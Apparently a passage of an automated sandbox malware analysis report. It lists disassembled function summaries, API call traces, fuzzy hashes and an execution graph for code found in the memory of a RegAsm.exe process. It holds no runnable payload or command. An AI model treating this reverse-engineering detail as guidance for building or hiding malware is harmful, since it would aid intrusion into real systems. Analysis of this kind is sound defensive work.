                                                                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                • API String ID: 2506810119-1068371695
                                                                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeHandleLibraryModule
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 662261464-1276376045
                                                                                                                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseHandleReadSize
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3642004256-0
                                                                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000017.00000002.880808733.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000017.00000002.880802341.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000017.00000002.880808733.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:5.9%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                Signature Coverage:1.8%
                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                Total number of Limit Nodes:66
                                                                                                                                                                                                execution_graph 37924 44660a 37927 4465e4 37924->37927 37926 446613 37928 4465f3 __dllonexit 37927->37928 37929 4465ed _onexit 37927->37929 37928->37926 37929->37928 37720 442ec6 19 API calls 37893 4152c6 malloc 37894 4152e2 37893->37894 37895 4152ef 37893->37895 37897 416760 11 API calls 37895->37897 37897->37894 37898 4232e8 37899 4232ef 37898->37899 37902 415b2c 37899->37902 37901 423305 37903 415b42 37902->37903 37908 415b46 37902->37908 37904 415b94 37903->37904 37906 415b5a 37903->37906 37903->37908 37909 4438b5 37904->37909 37907 415b79 memcpy 37906->37907 37906->37908 37907->37908 37908->37901 37910 4438d0 37909->37910 37920 4438c9 37909->37920 37923 415378 memcpy memcpy 37910->37923 37920->37908 37930 4466f4 37949 446904 37930->37949 37932 446700 GetModuleHandleA 37935 446710 __set_app_type __p__fmode __p__commode 37932->37935 37934 4467a4 37936 4467ac __setusermatherr 37934->37936 37937 4467b8 37934->37937 37935->37934 37936->37937 37950 4468f0 _controlfp 37937->37950 37939 4467bd _initterm GetEnvironmentStringsW _initterm 37940 44681e GetStartupInfoW 37939->37940 37941 446810 37939->37941 37943 446866 GetModuleHandleA 37940->37943 37951 41276d 37943->37951 37947 446896 exit 37948 44689d _cexit 37947->37948 37948->37941 37949->37932 37950->37939 37952 41277d 37951->37952 37994 4044a4 LoadLibraryW 37952->37994 37954 412785 37955 412789 37954->37955 38000 414b81 37954->38000 37955->37947 37955->37948 37958 4127c8 38004 412465 memset ??2@YAPAXI 37958->38004 37960 4127ea 38016 40ac21 37960->38016 37965 412813 38034 40dd07 memset 37965->38034 37966 412827 38039 40db69 memset 37966->38039 37969 412822 38061 4125b6 ??3@YAXPAX DeleteObject 37969->38061 37971 40ada2 _wcsicmp 37972 41283d 37971->37972 37972->37969 37975 412863 CoInitialize 37972->37975 38044 41268e 37972->38044 37974 412966 38062 40b1ab free free 37974->38062 38060 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37975->38060 37979 41296f 38063 40b633 37979->38063 37981 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37986 412957 CoUninitialize 37981->37986 37991 4128ca 37981->37991 37986->37969 37987 4128d0 TranslateAcceleratorW 37988 412941 GetMessageW 37987->37988 37987->37991 37988->37986 37988->37987 37989 412909 IsDialogMessageW 37989->37988 37989->37991 37990 4128fd IsDialogMessageW 37990->37988 37990->37989 37991->37987 37991->37989 37991->37990 37992 41292b TranslateMessage DispatchMessageW 37991->37992 37993 41291f IsDialogMessageW 37991->37993 37992->37988 37993->37988 37993->37992 37995 4044f3 37994->37995 37999 4044cf FreeLibrary 37994->37999 37997 404507 MessageBoxW 37995->37997 37998 40451e 37995->37998 37997->37954 37998->37954 37999->37995 38001 414b8a 38000->38001 38002 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38000->38002 38067 40a804 memset 38001->38067 38002->37958 38005 4124e0 38004->38005 38006 412505 ??2@YAPAXI 38005->38006 38007 41251c 38006->38007 38012 412521 38006->38012 38089 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38007->38089 38078 444722 38012->38078 38015 41259b wcscpy 38015->37960 38094 40b1ab free free 38016->38094 38020 40ad4b 38029 40ad76 38020->38029 38118 40a9ce 38020->38118 38021 40a9ce malloc memcpy free free 38022 40ac5c 38021->38022 38022->38020 38022->38021 38024 40ace7 free 38022->38024 38022->38029 38098 40a8d0 38022->38098 38110 4099f4 38022->38110 38024->38022 38028 40a8d0 7 API calls 38028->38029 38095 40aa04 38029->38095 38030 40ada2 38031 40adc9 38030->38031 38032 40adaa 38030->38032 38031->37965 38031->37966 38032->38031 38033 40adb3 _wcsicmp 38032->38033 38033->38031 38033->38032 38123 40dce0 38034->38123 38036 40dd3a GetModuleHandleW 38128 40dba7 38036->38128 38040 40dce0 3 API calls 38039->38040 38041 40db99 38040->38041 38200 40dae1 38041->38200 38214 402f3a 38044->38214 38046 412766 38046->37969 38046->37975 38047 4126d3 _wcsicmp 38048 4126a8 38047->38048 38048->38046 38048->38047 38050 41270a 38048->38050 38248 4125f8 7 API calls 38048->38248 38050->38046 38217 411ac5 38050->38217 38060->37981 38061->37974 38062->37979 38064 40b640 38063->38064 38065 40b639 free 38063->38065 38066 40b1ab free free 38064->38066 38065->38064 38066->37955 38068 40a83b GetSystemDirectoryW 38067->38068 38069 40a84c wcscpy 38067->38069 38068->38069 38074 409719 wcslen 38069->38074 38072 40a881 LoadLibraryW 38073 40a886 38072->38073 38073->38002 38075 409724 38074->38075 38076 409739 wcscat LoadLibraryW 38074->38076 38075->38076 38077 40972c wcscat 38075->38077 38076->38072 38076->38073 38077->38076 38079 444732 38078->38079 38080 444728 DeleteObject 38078->38080 38090 409cc3 38079->38090 38080->38079 38082 412551 38083 4010f9 38082->38083 38084 401130 38083->38084 38085 401134 GetModuleHandleW LoadIconW 38084->38085 38086 401107 wcsncat 38084->38086 38087 40a7be 38085->38087 38086->38084 38088 40a7d2 38087->38088 38088->38015 38088->38088 38089->38012 38093 409bfd memset wcscpy 38090->38093 38092 409cdb CreateFontIndirectW 38092->38082 38093->38092 38094->38022 38096 40aa14 38095->38096 38097 40aa0a free 38095->38097 38096->38030 38097->38096 38099 40a8eb 38098->38099 38100 40a8df wcslen 38098->38100 38101 40a906 free 38099->38101 38102 40a90f 38099->38102 38100->38099 38106 40a919 38101->38106 38103 4099f4 3 API calls 38102->38103 38103->38106 38104 40a932 38108 4099f4 3 API calls 38104->38108 38105 40a929 free 38107 40a93e memcpy 38105->38107 38106->38104 38106->38105 38107->38022 38109 40a93d 38108->38109 38109->38107 38111 409a41 38110->38111 38112 4099fb malloc 38110->38112 38111->38022 38114 409a37 38112->38114 38115 409a1c 38112->38115 38114->38022 38116 409a30 free 38115->38116 38117 409a20 memcpy 38115->38117 38116->38114 38117->38116 38119 40a9e7 38118->38119 38120 40a9dc free 38118->38120 38122 4099f4 3 API calls 38119->38122 38121 40a9f2 38120->38121 38121->38028 38122->38121 38147 409bca GetModuleFileNameW 38123->38147 38125 40dce6 wcsrchr 38126 40dcf5 38125->38126 38127 40dcf9 wcscat 38125->38127 38126->38127 38127->38036 38148 44db70 38128->38148 38132 40dbfd 38151 4447d9 38132->38151 38135 40dc34 wcscpy wcscpy 38177 40d6f5 38135->38177 38136 40dc1f wcscpy 38136->38135 38139 40d6f5 3 API calls 38140 40dc73 38139->38140 38141 40d6f5 3 API calls 38140->38141 38142 40dc89 38141->38142 38143 40d6f5 3 API calls 38142->38143 38144 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38143->38144 38183 40da80 38144->38183 38147->38125 38149 40dbb4 memset memset 38148->38149 38150 409bca GetModuleFileNameW 38149->38150 38150->38132 38153 4447f4 38151->38153 38152 40dc1b 38152->38135 38152->38136 38153->38152 38154 444807 ??2@YAPAXI 38153->38154 38155 44481f 38154->38155 38156 444873 _snwprintf 38155->38156 38157 4448ab wcscpy 38155->38157 38190 44474a 8 API calls 38156->38190 38159 4448bb 38157->38159 38191 44474a 8 API calls 38159->38191 38160 4448a7 38160->38157 38160->38159 38162 4448cd 38192 44474a 8 API calls 38162->38192 38164 4448e2 38193 44474a 8 API calls 38164->38193 38166 4448f7 38194 44474a 8 API calls 38166->38194 38168 44490c 38195 44474a 8 API calls 38168->38195 38170 444921 38196 44474a 8 API calls 38170->38196 38172 444936 38197 44474a 8 API calls 38172->38197 38174 44494b 38198 44474a 8 API calls 38174->38198 38176 444960 ??3@YAXPAX 38176->38152 38178 44db70 38177->38178 38179 40d702 memset GetPrivateProfileStringW 38178->38179 38180 40d752 38179->38180 38181 40d75c WritePrivateProfileStringW 38179->38181 38180->38181 38182 40d758 38180->38182 38181->38182 38182->38139 38184 44db70 38183->38184 38185 40da8d memset 38184->38185 38186 40daac LoadStringW 38185->38186 38187 40dac6 38186->38187 38187->38186 38189 40dade 38187->38189 38199 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38187->38199 38189->37969 38190->38160 38191->38162 38192->38164 38193->38166 38194->38168 38195->38170 38196->38172 38197->38174 38198->38176 38199->38187 38210 409b98 GetFileAttributesW 38200->38210 38202 40daea 38203 40daef wcscpy wcscpy GetPrivateProfileIntW 38202->38203 38209 40db63 